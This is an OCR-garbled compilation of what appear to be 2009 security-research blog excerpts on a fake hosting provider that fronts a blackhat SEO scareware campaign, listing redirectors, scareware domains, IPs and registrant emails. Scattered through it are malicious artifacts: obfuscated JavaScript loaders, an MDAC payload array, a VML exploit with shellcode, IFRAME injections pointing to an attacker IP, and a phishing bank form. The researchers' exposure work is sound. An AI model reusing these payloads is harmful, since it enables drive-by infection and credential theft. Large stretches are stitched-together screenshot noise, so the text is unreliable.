2. ttp://www.virustotal.com/analisis/dbff£d55928c1e8c0441a64ebc2c10785050bb90ce08ae053d2dacb9fa36d9849- 12442 
05554 

3. ttp://www.virustotal.com/analisis/ecde2d12aafb370b8dea92ba97476d8a032b5bb5 1ac4aa90cf 997af 88b1le4cc8- 12442 


5.6.5 Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign 
at Blogspot (2009-06-08 09:37) 
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a makePayLoad() 


var mdacPay = new Array( 

String. fromCharCode(123,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49, 49,68, 48, 45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,48,125), 
String. fromCharCode(123,66,68,57,54,67,53,53,54,45,54,53,65,51,45, 49, 49,68, 48, 45,57,56,51,65, 45,48, 48,67, 48,52, 70,67,50,57,69,51,54,125), 
String. fromCharCode(123,65,66,57,66,67,69,68,68,45,69,67,55,69,45,52,55,69,49,45,57,51,50,50,45,68,52,65,50,49,48,54,49,55,49,49,54,125), 
String. fromCharCode(123,48,48,48,54,70,48,51,51,45,48,48, 48,48, 45, 48,48, 45, 48, 45, 67,48, 48,48, 45, 48,48, 48,48, 48,48,48,48,48,48,52,54,125), 
String. fromCharCode(123,48,48,48,54,70,48,51,65,45, 48, 48, 48, 48, 45, 48, 48, 48, 48, 45,67, 48,48, 48, 45,48, 48,48,48,48,48,48,48,48,48,52,54,125), 
String. fromCharCode( 123,54, 101,51,50,48,55,48,97,45,55,54,54, 100,45,52, 101, 101,54,45,56,55,57, 99,45, 100,99, 49, 102,97,57,49, 100,50,102,99 
String.fromCharCode(123,54,52,49,52,53,49,50,66,45,66,57,55,56,45,52,53, 49,68, 45,65, 48, 68,56, 45, 70,67, 70,68, 70,51,51,69,56,51,51,67,125), 
String.fromCharCode(123,55,70,53,66,55,70,54,51,45,70,48,54, 70,45,52,51,51,49,45,56,65,50,54,45,51,51,57,69,48,51,67,48,65,69,51,68,125), 
String. fromCharCode(123,48,54,55,50,51,69,48,57,45,70,52,67,50,45,52,51,99,56,45,56,51,53,56,45,48,57,70,67,68,49,68,66,48,55,54,54, 125), 
String. fromCharCode(123,54,51,57,70,55,50,53,70,45,49,66,50,68,45,52,56,51,49, 45,65,57, 70,68, 45,56,55,52,56,52,55,54,56,50,48,49,48, 125), 
String. fromCharCode(123,66,65,48,49,56,53,57,57,45,49,68,66,51,45,52,52, 102,57,45,56,51,66,52,45,52,54,49,52,53,52,67,56,52,66, 70,56, 125) 
String. fromCharCode(123,68,48,67,48,55,68,53,54,45,55,67,54,57,45,52,51, 70,49, 45,66,52,65,48,45,50,53,70,53,65,49,49, 70,65,66,49,57,125), 
String. fromCharCode(123,69,56,67,67,67,68,68,70,45,67,65,50,56, 45, 52,57,54, 98, 45, 66, 48,53, 48, 45,54,67,48,55,67,57,54,50,52,55,54,66,125), 
String. fromCharCode(123,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,43,67,48,52,70,67,50,57,69,51,48,125),1 
return mdacPay; 
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<script>function v476ed62a4c966(u476ed62a4d139){ Function v476ed62ahd964 () {var 
v4k76ed62aheGd4=16; return ve76ed62ahe Gd4;} 

return(parselInt(¥476ed62a4d139 ,v476ed62a4d904()));}function v476ed62a4e8a4(u476ed62a4F074){ var 
v476ed62a507ee"2; var v4e76ed62a4F844~"* 5 for (us76ed62a5 601496; 
v476ed62a5 061 4<u476ed62a4F O74.length; v476ed62a506014+=u476ed62a5 Bee) { 

v476ed62akF844+=( String. fromCharCode(v476ed62a4C 966 (U476ed62a4F O74 .substr(u476ed62a5 6614, 
v476ed62a507ee))))>}return v476ed62a4F 844; > 

document .write(v476ed62a4e8a4( ‘30534352495 0542 060616E67756167653D226A617661736372697 07 4223E BAGDOS 
6B3D3 638 6866756E6374696F 6E2 0606461632829 0A7B 6A7661722 06879602 6302 6756E65 7363617 065282225364625363 
2222B226865222B2225363325373422293B OA7661 722 87 264736F 20302 8646F 63756D656E7 42E637265617465 45606560 
656E74286B87960293B 682 62 62 62 67264736F 2E736574417474726962757465282769642720277264736F 27293B0A76617 
220686964312 0302 6756E657363617 86528226360222B22253631253733253733222B22696422293B 0A7661722 0686964 
3220302 0756E65 7363617 06528226360222B22253733253639253634253341253432222B22443936222B 2225343325333 
§253335253336253244253336253335222B BA2 82 O82 62 62 82 82 82 82 62 82 82 O62 62 82 82 O2 62 62 62 0224133222B2225324425 
3331253331222B2225343425333 625324425 3339253338 2533332228 2241203 622282225333 62534332228 BA2 82 82 62 62 
62 62 62 62 62 62 62 62 62 62 62 82 62 62 62 82225333 6253334253436 253433222B2232222B2225333925343525333325333622 
293B 6A2 62 62 62 87 264736F2E73657441747472696275746528686964312068696432293B GA BA7 661722 86 16464626F 263 
D203 638 8A7 47279 6A7B GA76617 22 8686964332 83D2 6756E65 7363617 86528226164222B22253646253634253632253245 
253733253734222B227265222B2225363125364422293B 897661722 06 16464626F 622 8302 87 26.47 36F 2E437 2656174654 
F 62665637 428686 96433202222293B O92 62 62 62 0616.46. 4626F 2 6302 631 3B OA7 D 6A63617463682865297B7D 6A BAG 96628 
616464626F 20213D2631296A7B GA747279 GA2 62 62 62 67B GA7661722 6686964342 6302 6756E657363617 6528226164222 
B22253646253634253632253245253733253734222B22253732253635222B22616D22293B 687661722 06 16464626F 6228 
3D206E657720416374697665584F 6266563742868696434293B BA 2 62 62 82 06164646 26F 20302 6313B 6A 2 62 62 02 07D BAG 
3617463682865297B87D GA7D 6A OA6 966286 1646.4626F 2630302 03129 OA7B A747 279 GA2 O62 O62 62 B7B OA7661722 068696435 
20302 6756665736361 7 6652822253533222B 22686560 222B22253643253245253431222B227 87 8222B2225364325 36392 
22B22636174222B2225363925364625364522293B GA766172207368617 87 86F 26302872647 36F 2E4372656174654F 626A 
6563742868696 435 20 2222293B 687661722 0686964362 6302 6756E65 7363617 06528226D73222B2225373825364425364 
$222B22322E584D222B22253443253438 2535342228225 45 0222938 607661722 86D73786D6F 622 0302 66E657720416374 
69766558 4F 62696563742868696436293B 687661722 0686964372 83D 2 67 56E65 7363617 0652822253437 2228224522282 
2253534222938 GA2 62 62 62 060737 86D6F 622E6F 7 8656E286869643720226874747 B3A2F2F7275737369616E6E6577732E 
72752F6172616269632F 646174612F6E6577732F 757 66C06F 61642F 65787 62F6578652E 7 0687 622206661607365293B BA2 
62 62 62 66D73786D6F 622E73656E6428293B BA2 82 82 62 BHA2 82 82 62 06 16464626F 622E 74797 86520302 0313B 6A2 6202020 
616464626F 622E6F 7 0656E28293B BA2 G2 82 02 06 16.464626F 622E7772697 4652860737 86D6F 622E7 265737 B6F6E7365426 
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SAMPLE 1 MEGAZ0.org 


<body><script>eval (unescape("S77269%6e%64Z6FS7 7220S 73% 7 U%6 147 NS75%7 3%3AS2 7 ZUUZ6 FSG OLHS S27 SID ZHUZG 
F263%75%60%65%60%7 4S20%7 7% 7 2%69%7 NZ65%Z28%27%3C%69%66%7 226 126066 5 %2 046 0%6 1%6.0%65%30%33%33%65%62%35 
620% 73%7 2%63%30¢5C%27%68%7 NST NST 043.82 FS2FS7 NST 2%6 1% 666 626056 1%73%7 4ZO5%7 2420%62%69%7 a2 FSI NST 2% 
61%66%66%20%7 O%68%7 OS3FS27S2DS4ASO1% 7 NGOB%2ES7 246 FS7 5460 SENSES HI 1%7 NS6BG2E G7 246 1460 SONG6FSEdS2 
8%29%2a%33%33%3 0F38%36%3N%29%2DS2 736 NS3 O43 O43 046543 0%36%6 1%33%32%50%2 742 O47 746 9S6NS7 NZ68%30%37%33 
%32%2 0%68%65%69%67%68%7 4Z3d%3N%IS%32%2 O47 3%7N%7 9ZHCSOHSSIISSC%27ZON%O9%7 3%7 OSG C6 1%7 9%3.a%2 OSG OZOFS 
GE%HSSSCL27SIOVICLZFRGIBGH6W7 2%61%60%G5%IE%27%29") ) 5 </script| 


SAMPLE 2 MEGAZ0.org 


<script Language=JavaScript>function ban(x){var 

l=x length ,b=1624,i,j,r,p=0,s5=0,w=6,t=Array(63,45,23,3,40,25,24,44,34,43,0,0,6,0,0,6,1,18,52,28,1 
2,32,37,39,21,36,51,22,11,29,9,7,38,46,59,56,53,55,36,62,5,4,18,0,0,0,6,27,8,2,33,19,6,49,50,47,2 
6,54,60,35,61,8,13,58,26,42,57,17,16,48,0,14,41,15,31) ;for( j=Math.ceil(1/b) ;j>0;j--){r="‘ ;for(i=M 
ath.min(1,b);i>6;i--,1--){w]=(t[x -CharCodeAt(p++)-48])<<s;if(s){r+=String .fromCharCode( 174° w&255) 
;W>>=8 ;5-=2}else{s=6} }document .write(r) }}ban( 'AIDFCOjULRGUCU JUd91i I CSEQWSUI ZC JL3SeukCu@qnEwP1e291 
ecWxkdgjeN_7icWxkH91T ag jU6z2CU0J jeaz7i2cxe097FL3DUAdSenJ1J3qgDU' )</script><script>eval (unescape("%7 
7369%60Z6N%6FS7 7%20%7 3S 7 4S61%7 4S7 57 3S3d%2 7 Z4N%6 F460 S65%2 7 43D 4646 F637 5460465 %60S7 NZ20%7 7472469 
%7N%65%28%27%30%69%66%7 226 1%6.0%65%2 046 0 %6 1%6.0%65%3d%35%3 126 2%2 047 3%7 2463%3dS5C%27Z68%7 NS7 NS7 OZ3a% 
2FL2F%S7NS7 226 126 6%66%60%6 1%7 3% 7 NZ65%7 2%20%62%6 9% 7 ASZFS7 N%7 2%6 1%66%66%20%7 O%68%7 HESFS27%2DSEHISH1%7 
4%68%20%7 2%6 F%75%60%6 4S 2BS4I%6 1% 7 HSGBS2ES7 246 1%60%6 4%6 F260%28%29%2.a%3 143 043 143 1%38%34%29S20%27%03 
%32%6 1%63%62%66%63%66%64%3 9%I8S5C S27 %2 OS 7 746 9%64%S7 4S68%3%3 7SSNSSHS2 846846 546 9%6 746847 NSIdGI91%33% 
36%20%73%7 NS79%60%65%3d%5C%2 756426 9%73%7 OF60%6 127 9%3.a%2 0% 6046 FSG ESOS S5CS27 SSO SICS2FSOI%H6%7 26146 
0%65%3e%27%29")); </script> 
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ET AV on in fy 


Free Hosting for Life 


se us 


"Free HoStInG FoR YoU" Hosting 


We ave pleated to announce the lourch of dirste.com, the best ASP_NET host on the wed 
We currently offer one plan. Thes plan is entirely free! Free ASP.NET 2.0 hosting"! 


Unfortunately we have It our quota for od free accounts. Every fren signup Is now required 
to Gsplay 2 460x060 Denner ad on thew contert pages. We will Be running another ad free 
promotion soon, so be sure to check Dect 


We ee Currently expenencing some techrecal issues that are out of ou control We ae 
aitlering some server problems and 85 8 result, shoht Gelays m processing agrups. We are 
wortuing on &, and will Rave everything resolved as soon as possible. Thank you for your 
pamence 


Features 
© ASP.NET 2.0 
© SQL database (MSDE 
© Subdomain 
© ETP upload support 
oe PHP 
«o Pert 
@ Python 
@ Unbrrted MyS¢ dstabeses 
@ Goman Parking (upon request 


Questions? Visit our FAQ! 


* Free for personal and/or educational purposes. 
Commercial use strictly prohibited. For more terms and 
conditions, please click here, 


[Advertise .. Terms and Conditions .: host #8 dirsite.com LifedYou.info 44 <| 


Just like [1]GazTranzitStroyInfo’s case, what we’ve got here is failure to understand that the 
efforts put into building legitimacy of front-ends to cybercrime, is prone to get undermined 
upon closer examination of the particular web hosting provider. 


Who, and what is Life4you .info - Free Hosting for Live (dirsite .com; 65.98.15.80; Den- 
nis Linkor Email: admin@dirsite.com)? 


"We are pleased to announce the launch of dirsite.com, the best ASP.NET host on the web. We 
currently offer one plan. This plan is entirely free! Free ASP.NET 2.0 hosting*! Unfortunately 
we have hit our quota for ad free accounts. Every new signup is now required to display a 
460x60 banner ad on their content pages. We will be running another ad free promotion soon, 
so be sure to check back! We are currently experiencing some technical issues that are out of 
our control. We are suffering some server problems and as a result, slight delays in processing 
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ABOUT US SERVICES CAREERS PARTNERS PRIVACY CONTACTS 


WE ARE RECRUITING \ y 
T JOB XN. iy 
i} = vray 


ag 


CESS s BASS oe SERS ELF NEWS # 


@O Friday, thay 451, 2009 
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WE ARE RECRUITING! 
APPLY NOW 


Ute 
tecede Conan 
Cn Letaten 
feachtront 
cans 
nveiate Cones Out Ceteten 
Pereces mand Paresee wand § ted 


ae wc etebe Umer me Bay Som 
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Sh658.000 


THs STK 


ABOUT US 


CATO WE OEE ye NR Ney OF ere Mee APS LR EEL ee OLE BY Co Pe 
wate eee DP hae Bepes 


Pe tte Sete ek VE OR Dae CAS Oe cer der aes Binte fetter Gores Oe el be Fe 
NO Fem te tere Manet Red Be Lot pets 


FOR EATS ORES HORS Phere Aree bene od Oe beth Oo Beles Catrnene orem 
Ste 6 9e >, Farad rte a YO ithe EA Nt Cotne a4 Seine CMD 6799 MERE § ore 
On ee Ee OR ee 
VE AD ere WES ed EE Pape Bee © ORO Peres eb ret An & Deere Or re et 
Three er ear iow Boy fem Ae eee BUTE CLD SRE) Sete Coty Oh Re Me Re 
orhetae HPT Saher Cah Eee Ded Le Gene Demet & 0 VEE CEES 0 te UP te ee 
ted he tie OT ORO ar AE Set ay ate ep eh) er 


PLE St Reg ERK fed WRG oe WoW Co Rin Tg Fine 4 Yeas HE reper on tye Melon at 
CPO OE 8 OR OH rE 1 em ee ne etetet £0 eel et 8 ee Oe em Ome ee ee Rie 
oon 


CGT 6 DAE FA Shere Wepem 
SWE E Aey Care ed 


Abel = 6 Amer os Cite Cm Ee Pes Sag ey 
Request eee Pe, eter! Bbeete Arte Oterd Gareedie” Mets Head mee Soe Sees oe 
Cee feat Comm nee rete 


EN EM Es ee 


Jette 

De 00 i aetegeret 
he 

Pree arte 

etree 


DOTO Lae EOL Nemeeey 
RE os Mle) Ste Hee 

ee ee 

St ee ee 
on Sette 


Lael Bid den chdalh cassie cities edited hittin te) 
Pee PS ee RPS RG IN UN IO ete om WD ERE eed ares HL eaten Lots 


SRP Gre ee ne 
Ad Ragen hae oe 


Ado a | gat andl Fimamons | Serene | Contacte | Partners | Prepay Ret) Priewey pety 
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ABOUT US 

ek eee Oe ee ee ee ee 
SEN OS Paty oe at OO Es peed. ORE D NITE Aes Sete, Oe Dy 
Ce ee ee Oe Oe ee 
potest 2 BO ort ate MeN pen bucee footie dos tort 

ened we Bpaty tog bel “eps eat OM Ce Fe tS Acete® © they tap hohe 
& eee Cre © vate reeR Ie Cefreer Ope. Oe 7 Peer at 


ons 


Om fates epenes hat we POSE ee eee] Om SC hherteme ol ea 
O68 ON TS * Bee Mak COCR TA ee 

PRN RD puted a “thee for be, Vertyed @8 te © qe 
WORD Flee 2s Soy 

ie et id 

25 Oe A Gent Wee & Sr BNO Ged eee Some ee eeteeeTa & 
pele eee  2Neh AF eb 8 ae MOET EE GN OS Kees EAR Myc at el 
“PSER O Per etm Tied we ONG greeny Maer Cot ere qh) ont 
UR MAE RS Pe DE Ome hne SO a 

2 PO AOE Se ES TE OR CAG ON AE me Orlet ye 


[841] 


introduction BIVEC or§tio contacts 
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signups. We are working on it, and will have everything resolved as soon as possible. Thank 
you for your patience." 


What’s so special about them? Well, for starters, they’ve got no customers but the cyber- 
criminals themselves maintaining a portfolio of over 7,000 adult related keywords which they 
have been using for blackhat SEO campaigns across thousands of automatically registered - 
[2]CAPTCHA recognition outsourced - Blogspot accounts since February, 2009. 


With the Blogspot campaign still ongoing, let’s assess it and expose all the participating 
scareware domains. Upon automatic generation of the Blogspot accounts, links like the 
following are included next to the bogus content, all using dirsite.com’s pseudo-legitimate 
hosting services: 
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itd 2 AACA CAV ATAVATATAVAVAVAVAVAVAVAVAVAVAVAVAVAVATATATATAVAVATAVATATATATATATATATA\ 
ENANANANENIZNZNANINENENANINININININININENINININININININININININININININININININININININININININING 
NANANANANANANINIZNANANANININININININININININININININE 5 

Vila tae eae eC ACATINS 07-004 UML integer overflow exploit , exploit by 
imail.com , exploit maker by kook1991 :-) B¥YAVA¥Ar 
document .writeln(“\/\/\/Microsoft 
Patch:http:\/\/www.microsoft .com\/technet\/security\/Bulletin\/MS67-664.mspx -=Just.For .Fan=- 
2607 .61.21\/\/\/")5 

document .writelm("\/\/AN\/ANANANANANANANANANANANANANIZNINANANANININANANANININANANENINININININININENEN 
ENANANENENINANANIZNANENANANININANENININENANINININININENININENININININININENINENININININLNINININING 
NANANANANANANIANANANANANANINANANINININININANINININANE D5 

document .writeln("-->"); 

document .writeln("'"); 

document .writeln("<html xalns:ue\"urn:schemas-microsoft-con:unl\">"); 

document .writeln(""); 

document .writeln(“<head>"'); 

document .writeln("<object id=\"UMLRender\""') ; 

document .writeln("classid=\"CLSID:166072CEC-8CC1-11D1-986E-66A BCOSSB42ZE\">") ; 

document .writeln("<\/object>"); 

document .writeln(“<style>"); 

document .writeln("“u\\:* ¢ behavior: url(#UMLRender); }**); 

document .writeln("<\/style>") ; 

document .writeln("<\/head>"); 

document .writeln(""); 

document .writeln("<body>"); 

document .writeln(''"); 

document .writeln("<SCRIPT language=\"javascript\">") ; 

document .writeln(“shellcode = 

unescape (\"3u9 69 62u9 09 64u43433%u4343%u43 43 ZUNE 9 Zu BO OOZuSF 6O%uN1 6 4Zu O63 4u OO60Zu4 O8BZusB OCZu1C7 Ou 
SBADZu O868ZuF 78B Zu B4GAZUES5 9%u BO43Zu BH HGZuF IE2Zu6F 68Zu BOGE {USS BOZu7 27 5Zu6D6CZuFFS4Zu95 16Zu2EES{usa 
060%u83 062u2 BECZuUDC8BZu2 G6AZUFF5S3%u 8456%u B40 7ZuSC O3%u2E6 1ZuC765%u 83 44%u 78 O4%u 6065%u33 6HZu5 OC GZu53 
5 6%u5 057%u56F F2u8B1 64u5 ODCZuF F53%u O856%u5S6F FZu5 1 OCZu8B56%u39C75%u7 48B%u782EZuF 5 O3Zu8B56%u2 07 6%uF SB 
33u0933%u4149%u B3ADZu33C54u GF DBSu1 GBEZuD6 3ASu G87 SZuCBC 13u 63 OD Su4 ODASUF AEB Sut F SB{uE775ZuSBSE4Zu24SE 


lifeasageek at 


CJ Wizards je] D:\Program Files\Microsoft Visual Studio 9.@WC>nk 
— EE a D:\Program Files\Microsoft Visual Studio 9.@WO>nidl srvsvuc. 
S| St Use rt f £0 12b/64b MIDL Compiler Vers ic 88.8508 
= y <c> Microsoft Corporation 1991-20@6. All rights reserved. 
idl 


f= README TIT h srvsve. bh 
= D:\Program Files Nticrosoft Visual Studio 9.@WC>el /Fedie srvsvc_killer.cpp sr 
: yO_© .¢ MI rpert4.lib 
srvsve. idl Cc Srvsvc_¢. ¢ $ 88x86 Microsoft <R 
2) <C> Microsoft Corporation 

& arvave_c. obj C++ arveve_killer. cpp 
oe srveve_killer. obj srveves ¢ : i 

g i croso <R> re al Linker Version 9.00.21022.08 


Corporation. All rights reserve 
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goto.dirsite 
goto.dirsite 
goto.dirsite 
goto.dirsite 
goto.dirsite 
goto.dirsite 
goto.dirsite 
goto.dirsite 
goto.dirsite 
goto.dirsite 


.com/go.php?sid=2 &tds-key=erotic+bikini+babes 
.com/go.php?sid=2 &tds-key=sexe+amateur+on+my+space 
.com/go.php?sid=2 &tds-key=aunt+judy+older+women 
.com/go.php?sid=2 &tds-key=view+private+profiles+on+myspace 
.com/go.php?sid=2 &tds-key=fullmetal+alchemist+porn 
.com/go.php?sid=2 &tds-key=Asian+style+bed+throws 
.com/go.php?sid=2 &tds-key=cheerleader+candid+pictures 
.com/go.php?sid=2 &tds-key=desisexstories 

.com/go.php?sid=2 &tds-key=Hey+Arnold+porno 
.com/go.php?sid=2 &tds-key=warcraft+henrai 
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= Ultra AntiVir 2009 


De Protect against spyware, 
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and show performance. 


What Is URtra Anti 20097 > ttre Antivir 2009 detects and removes harmful programs 
wWret Is Soyware? Ura Arter 2009 uses advanced technology to detect signs of malicious behavier. © 
nT constantly montonng the ectwity on yout PC Ure APO 2088 Technology abe to hurt 
‘Sagres of Spyware down and paralyze new and cew 
How dol get Ultra Ante 20097 0 Ultra Artivir 2009 helps protect vour comes 00a BOO Sms Mow Certormences Bad 
removing know 


COMERS BDONS 
murwruzes mterrupbens, and helps you stay protected. 


Benefits of using Ultra Antivir 2009 include: 


Spyware and harmful files detection and removal 


Ultra Arbivir 2009 quickly and easily finds spywere and cther harmful programs that can 
slow Gown your commuter, Gspley annoying DOp-ue ads, Change Irntemet settings, oF 
misuse your private information without your consent. 

Utra ArtVe 2009 eleremates Getected spywere easly at your drechon. 


Ura Antivir 2009 allows you to schedule your penetra i fh 
Converment for you "whether s on-demand or on a ecvedule that 


Improved Internet browsing safety and security 


Umra Aroivw 2009 helps stop spyware before « mstalls Aself on your computer. 


Upon clicking the users are redirected to tdncgo2009 .com/?uid=68 &pid=3 (trdatasft .com; 
fra22 .net; Email: ) 64.86.17.47, Email: hmlragnsky@whoisservices.cn, where the scareware 
domains are randomly loaded: 


virusdoctor-onlinedefender .com - 64.213.140.69 Email: sebarinvert.ivus@gmail.com 
onlinescan-ultraantivirus2009 .com - 206.53.61.76 

virussweeper-scan .net - 206.53.61.76 

virusalarm-scanvirus .net - 206.53.61.76 

viruscatcher .net - 64.213.140.71 Email: jeannemcpeters@gmail.com 
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Secure hi 


Remote User (Public Key): Key ID: 5D376133 a 
Local User (Private Key): Key ID: F64F974E bad » 


| Message to Send Encrypted | Received Encypted Message | Received Message Decrypted 4 | > 


GH Clear | & Load... | 
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Ol ss Ul ge bleed calaily Gaablnal ab daa ey ctl ji aay) opal Mgdll GUabadall 52 Gah LS cll gd 
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Compression: 43.2% Cipher: Rijndael (4E5), Key size: 256 | x Close | 
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| titExpicis Pack ADmmeraneL > 


Login: admin /Logout 


{ Stats }{ Languages }{ Change password }[ Add user }{ Clear DataBase } 
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62.33.5493 203.162.3.146 
84.254 43.17 207 214.14.150 
84.254 43.17 203.177.171.199 
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phpMyAdmin- _|mportieren 
Extra 2.10.2 


~Zu importierende Datei —— _ 


(Maxinate Dateigr Ge: 8.1925) 


Zeichencodierung der Datex sts =) 
Oatethomprimierung wird automatisch erkanrt bet keine zip, 


~Partieller import 


 Abbruch wenn die maxknale Scrigtioutzet erreicht wird. Dama ®t es mdglich groG@e Detelen zu inportieren, allerdings kann es 
Transaktionen zerstéren 


Anzehi der am Anfang Zu Gberspringenden Entrige (Abtragen) Op 
p Deteiformeat ~ 


@ SOL SOL-Optionen 
~ Neues phpMyAdmin. SQL-Kompatiaitatsmodus NONE 5 
Fenster 2 


ok 
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Kscript>docunent .write(unescape (“%3c%53%43%5 274925 OZ5N%2 OSUCSH 1 SUE TAT SS SLU 1SZU7 SUS S3IdS2274a%61%7 6% 
61%53%63%7 2%69%7 6274%22%30%66%7 5Z60L63%7 426 946 FZ6 OZ2 O26 4Z60%69%6.a%66%6 9Z7 1Z6CLON%28%7 2% 7 247 2E29%7 
D%76%61%72%2 047 4Z65%6%7 O430%22%22%3b%2 0S7 646 147 2%.2 046356 326 3%3d%3 OSS %2 OS7 661% 7 242 O46 FS75%7 4S3d 
%22%22%3D%76%61%7 2%2 047 3%7 4S 7 2%30%72%7 2%7 243D%6C490%73%7 NS7 2% 20%60S65%60%67 47 NSO8SIDS7 7 268%69%6C% 
65%28%63%63%63%30%3d%73%7 NS 7 2%20%60%65%60%67%7 NZ68%2d%3 1%29%7D%7 7%68%6 9%60%65%28%73%7 NSZ7 2% 20%63%6 
8%61%72%41%7 4S 2836 3%63%63%29%2 1%30%27Z29%27 229% 7 UZOHSLOUS7 GS3AS7ULHSZONS7 OS2DZ7 37 UZ72%20%63S68761 
%7 2%41%74%28%63%63%63%2D%20%29%3D%63%63%6 3S2DS2D SSD 66 F S757 HS3IS6FS7 S47 NS 2D %53%7 4S 7 246 9SHES6 7 S2E% 
66%72%6 F%60%43%68%61%7 2443%6 F%64%65%28%7 0%61%7 2%7 3%65S49S60%7 4% 28% 7 4Z65 460% 7 O420%31%36%29%20%38%d 
6%29%3b%74%65%60%7 043d%22%22%3b%7 d%6.4%6 F%63%75%60%65%60S7 NZ20R7 7%7 2%69%7 NZ6SS28S6F S75 %7NS29%3bS7d 
G3CS2FZSIZU3ZS2SUISS OSS UZZe") ) ;dmi j Fiqlm("92)BE)CA)C3)C2)76)CE)C3)C2)C4)C9)96)CC)93)78)CB)C8)CH)9 
6)C9)B9)BE)BB)C3)B7)C9)83)C3)BF)B9)C8)C5)C9)C5)BC)CA)83)B9)C5)C3)98)CC)C3)C2)78)94%)63)68)63)68)92 
)BE)BB)B7)BA)94)63)68)92)C5)B8)C8)BB)B9)CA)76)BF )BA)93)78)AC)AS)AZ)AS)BB)C4)BA)BB)C8)78)76)B9)C2) 
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F)8E)8C)9B)83)86)86)97)86)99)8F )8B)8B)98)8A)88)9B)78)94%)63)68)92)85)CS)BS)CB)BB)B9)CA)94)63)60)92 
)C9)CA)CF )C2)BB)94)63)68)CC)B2)96)86)76)D1)76)B8)BB)BE)B7)CC)BF)C5)C8)98)76)CB)C8)C2)7E)79)AC)AZ) 
A2)A8)BB)C4)BA)BB)C8) 7F)91)76)D3)63)668)92)85)C9)CA)CF )C2)BB)94)63)60)92)85)BE)BB)B7)BA)94)63)66)4 
3)66)92)B8)CS)BA)CF )94)92)BA)BF )CC)76)BF )BA)93)78)C3)CF)9A)BF )CC)97)78)94)92)85)BA) BF )CC)94)63)6€ 
)SF )63)66)92)C9)B9)C8)BF)C6)CA)76)C2)B7)C4)BD)CB)B7)BD)BB)93)78)AG)B7 )CC)B7)AY)B9)CS8)BF )CG6)CA)78) 
94)63)68)5F )5F )63)66)5F )BC)CB)C4)B9)CA)BF)CS)C4)76)C6)BA)CB)CS)C2)B9)CF)CG)7E)C8)BF)C%)C1)CF)BD)A 
7)82)76)BC)C3)C4)C3)CA)C1)D6)B7)7F )63)66)5F )D1)63)60)5F )5F )CD)BE)BF )C2)BB)76)7E)C8)BF)C4)C1)CF)BD 
)87)84)C2)BB)C4)BD)CA)BE)86)88)92)BC)C3)C4)C3)CA)C1)D6)B7)7F )63)60)5F SF )C8)BF)C4)C1)CF)BD)87)76) 
81)93)76)C8)BF)C4)C1)CF)BD)87)91)63)66)SF )SF )C8)BF)C4)C1)CF )BD)87)76)93)76)C8) BF )C4)C1)CF)BD)87)8 
4)C9)CB)B8)C9)CA)C8)BF )C%)BD) 7E)86)82)BC)C3)C4)C3)CA)C1)DG)B7)85)88)7F )91)63)66)5F)SF)C8)BB)CA)CH 
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)7B)CB)86)8A)8E)B8)7B)CB)86)89)8E)B8)7B)CB)B9)89)B9)8B)7B)CB)8D)88)8D)8B)7B)CB)8C)BA)8C)B9)7B)CB) 
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OnLine Banking 


ONLINE CUSTOMER FORM 


Your Personal Details 


Pleate enter you Tele, Fust nore, Modle narne(s), Surname, Home portcode and Emmet address 


Tale (Mr Ms/Ms/Other) 
Terst mame 


Puddle manwe(s) (if any) * 


Sermamer 
Home postcode 
tenall address 


Your Banking Details 


Pleate enter you Customer Munber (tus is pour Cote of beth (Sdrrwnys) followed by you urque number ehich iGentifies pou to the Bank), PIN, Pariword, Account number (# you Neve several 


BChOUTA Muenbers, enter them all, separated by corner) and Sort code(# you Nave several account murnbers, enter all sort codes, separated by communes) 


Costemer eember 
PIN 

Password 

Account member(s) 
Sort code(s) 


* indicates an options! held 
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fast-antivirus .com - 64.213.140.68 


The [3]scareware attempts to [4]phone back to updatel.virusshieldpro .com/ReleaseXP.exe - 
206.53.61.75 - Email: unitedisystems@gmail.com and to updvmfnow .cn - 64.86.17.9 Email: 
oijfsd.sd@gmail.com. ReleaseXP.exe then phones back to the following locations, naturally 
earning profit for the cybecriminal - 


Wind Optimizer 


Lega! | Prvecypoicy | Terns cfserace | Refund potcy 


| Wind Optimizer _ 


What does Wind Optimizer do? 


Diagnoses ang tines hard Grve problems * 300 MHz ce taster 
Oetragmerts. cleans, and rearranges Me hard processor 

drive for opemized performance = 256 US of RAM (512 MB 
QU) ated permanenty Hemoves Ura anted recommended) 
Inteenet cookies, Cache. and temporary Mes fist sd pdt a 


show your Computers performance sk space 

4 Speeds up your system by preverting He = CO-ROM of OVD ave for 
automabe Wading of undeswed sofware so@ware mstaiiabon on 
aposcabons, meaa 

5 WOenthes and ines protiems with Ihe Windows © Abcrosed intemet 
registy. system Mes, and sc@ware appecatons * DownioacSicee §= 1 6B Explorer® 6 0 or later 

6 Seacches disks tor deleted tes and recovers hem * BuyNow $29.95 + Morita Firefox® 2.0 ce 
to ew onginal state (avatable on IF ony) Version 1002 tater 

7. Sately and permanenty removes sensitive tes © Super VGA (6001800) or 
from your computer lo higher reschueon wdeo 

& Allows you to easy see which sofware processes edagter ans moniter 
are running on your System and which ones are © OWecth 8.0 oF tater for 
afectng £3 overal performance Pertoemance Test™ by 

9 Enables you to custome Windows seBings PassMark™ sofware’ 
ACCeRaing to the way you Use your Computer 

10. Maintains your PC wih a cick of he bution 


pay-virusshield .cn - 64.213.140.70; Email: unitedisystems@gmail.com; Returning the follow- 
ing message: "Sorry, the operation is currently unavailable, please email our support team 
from product’s site (Error Code #150)" 

updvmfnow .cn - 64.86.17.9 

updvmfnow .cn/reports/install-report.php (64.86.17.9) 

updvmfnow .cn/reports/soft-report. php 

updvmfnow .cn/reports/minstalls.php 
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© Select C:\ WINDOWS \system32\crnd_exe - SmartCaBot.exe run 
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Search results for "state farm auto insurance quote <IFRAME src ... 

Search results for “state farm auto insurance quote <IFRAME sre=//195.225.178.21/5> *. Sign 
up for e-mail alerts by search term “state farm auto insurance ... 

www. news. com/2990-5_ 3-1, = ag re nll la 
20sre=//195.225.178.21/5%3E - 39k - Cached - Similar pages 


if di mi islF =if 
Search results for “ash and misty hentai <IFRAME src=//195.225.178.21/a> ". Sign up for e- 
mail alerts by search term “ash and misty hentai <IFRAME .. 
wow. news.com/2990-5_3-1. himl?query=ashandisty hentai K3CIFRAMEN 
20s1c=//195.225.178.21/a%3E - 39k - Cached - Similar pages 


Search results for "border around page for ace <IFRAME src ... 

